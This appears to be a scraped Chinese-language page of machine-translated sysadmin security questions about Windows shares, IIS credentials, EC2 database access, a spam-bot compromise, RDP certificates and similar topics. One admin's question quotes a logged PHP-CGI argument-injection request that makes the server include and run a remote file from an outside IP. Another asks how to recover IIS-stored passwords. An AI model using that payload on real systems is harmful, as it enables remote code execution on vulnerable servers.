服务器 Gind.cn

Articles of 安全

XP服务器允许所有域用户共享c $

我有一台XP Pro电脑作为一个Quickbooks服务器。 我注意到,域上的任何用户都可以通过\\quickbooks\c$访问计算机。 我查看了quickbooks服务器上的本地pipe理员组,并且没有任何域用户可以参与的组。 我检查了所有Windows Server 2008计算机上的访问,并且按预期工作(域用户无法访问c $共享)。 这只是一台电脑,允许他们。 我找不到任何暗示为什么它允许所有人访问。 任何想法,我可以检查?

提取iis保存的密码

在域的IIS6设置下,在Directory Securty»身份validation和访问控制»启用匿名访问下,通常会提供用户名和密码,指定用于匿名访问的用户凭证。 由于密码必须保存在某个地方,你将如何去检索它?

访问Amazon EC2服务器托pipe数据库的安全方法

我有亚马逊EC2服务器上托pipe的MySQL数据库,我想远程访问它进行更改。 由于我没有静态IP,我不能允许在防火墙的特定IP安全访问端口3306。 有没有其他方法可以安全地从远程机器打开3306? 一个解决scheme可以隧道端口3306通过SSH,所以任何其他安全访问解决scheme,我们必须访问3306? 谢谢

Linux服务器“黑客攻击”,试图找出它是如何完成的

可能重复: 我的服务器被黑了应急 大约一个星期前,一个机器人闯入我们的一个linux服务器,并发送了70k个垃圾邮件。 我查看了一下日志,发现了什么时候连接了机器人,哪些邮件发送给了谁,以及机器人使用了什么IP地址。 但是,我不知道他是如何发邮件的。 bash历史似乎是空的,似乎没有文件修改(我检查“查找”)。 我们希望确保没有任何隐藏的程序开始发送垃圾邮件,或者一旦我们把服务器重新联机,就开始发送垃圾邮件。 所以,我问:关于机器人如何发送电子邮件的任何想法? 难道他只是在bash中执行了一个大的命令吗? 我们应该完全重新安装在服务器上的操作系统,还是安全地保持它与“黑客”系统运行? 提前致谢

在FreeNAS上存储encryption数据有哪些select?

我正在考虑将一对镜像的FreeNAS服务器作为文件存储库来实现。 唯一需要回答的问题是人身安全。 我通常会encryption所有服务器上的底层驱动器,但看起来这是FreeNAS的仅有遗留function,而ZFS目前还没有开放的解决scheme。 有没有其他pipe理员这个问题谁find了可以接受的方式来解决呢?

如何configuration远程桌面会话主机服务器使用第三方CA和证书?

我试图加强我们的RDP服务,所以我们可以使用一个特定的服务器,而不必VPN到我们的networking。 我希望RDP会话主机服务器使用来自Verisign或RapidSSL等授权证书颁发机构的证书。 如果甚至有可能的话,我似乎无法find任何好的教程。 现在我们使用提供的默认自签名证书。 当我select“select”时,只显示默认的自签名证书。 没有其他的select。 我不太清楚如何从我们的官方证书颁发机构添加我们的CA证书。 有没有办法改变为第三方CA Certconfiguration? 而且,对于encryption级别,将其设置为高或符合FIPS是否更安全? 如果您认为公开RDP服务是不明智的,请分享。 任何信息非常感谢。 谢谢! 我想我应该添加这个服务器也是一个Active Directory域的成员。

潜在的Bot-Net组织者正在探索新机器?

今天我收到了不同IP的一些漏洞攻击。 GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt info3.txt的内容是: Google在过去的几天里正在展示一大堆人在谈论这个问题,但没有真正的解决scheme或解释。 有一个写在: http : //huguesjohnson.com/programming/hacking-attempt/ “我认为这是我现在要离开的地方,我不知道这个网站是否属于犯罪集团的一部分,但是因为它可以访问僵尸networking,所以我认为它是81.17.24.82 IP没有出现任何恶意软件经销商的地方,也许这是一个最近被攻破的networking服务器,或者是最近被组织这次攻击的一个IP地址。 我的问题是:这种情况下的下一步是什么? pipe理员应该遵循以通知安全人员的最佳做法是什么? 你遵循哪些网站来保持这样的事情,并应用适当的安全措施(如mod_security)?

在“Internet区域”安全区域中运行的应用程序的特权是什么?

我们有一个通过ClickOnce部署的应用程序。 当我们从URL安装它时,这个应用程序有安全区域“Internet区域”。 正如我在标题中提到的,我想find一种方法来知道授予从“Internet区域”运行的应用程序的权限列表。

在公司环境中更新应用程序

我对这个问题很陌生,希望能有一些启发。 我正在创build一个明显具有多个服务器和多个工作站的公司networking。 比方说一个新的Adobe Flash版本出来。 我想你会想在testing环境中testing这个更新,然后再“推出”到服务器和工作站。 你们如何控制,testing,然后推送应用程序更新? (我不是在谈论Windows更新)。 你使用第三方的系统pipe理员工具吗? 家庭软件? 任何信息将不胜感激:)

仅允许来自特定IP的SSH访问是安全的吗?

我目前正在为我的Ubuntu服务器安装CSF( http://www.configserver.com/ ),并且在CSf中,您可以指定希望每个人都可以访问的端口,并且如果您的IP处于允许的范围内列表你仍然可以访问任何端口,即使它不在端口列表中。 我想知道是否愚蠢阻止每个人的SSH端口,只允许从允许的IP列表访问。 这是一个好主意,还是不是?
Intereting Posts
Azure AD,InTune,TeamViewer SSH:将多个端口连接到远程服务器 思科QuickVPN无法查看本地计算机 无效的命令“SSLOpenSSLConfCmd”,可能是拼写错误或由未包含在服务器configuration中的模块定义 好的开源代理服务器软件的Windows服务器? sed中的正则expression式:匹配前面或后面没有特定其他字符的字符 反向DNS到未知主机名的问题 平均负载如何与CPU利用率相关? 从Outlook客户端还原Exchange Solaris 10与Solaris 11 Nginx上游错误 将.mbx文件转换为.pst文件 错误日志级别Apache 2.4 布尔型ftp_home_dir未定义 – RHEL7.3 NFScaching是按块还是按文件读取?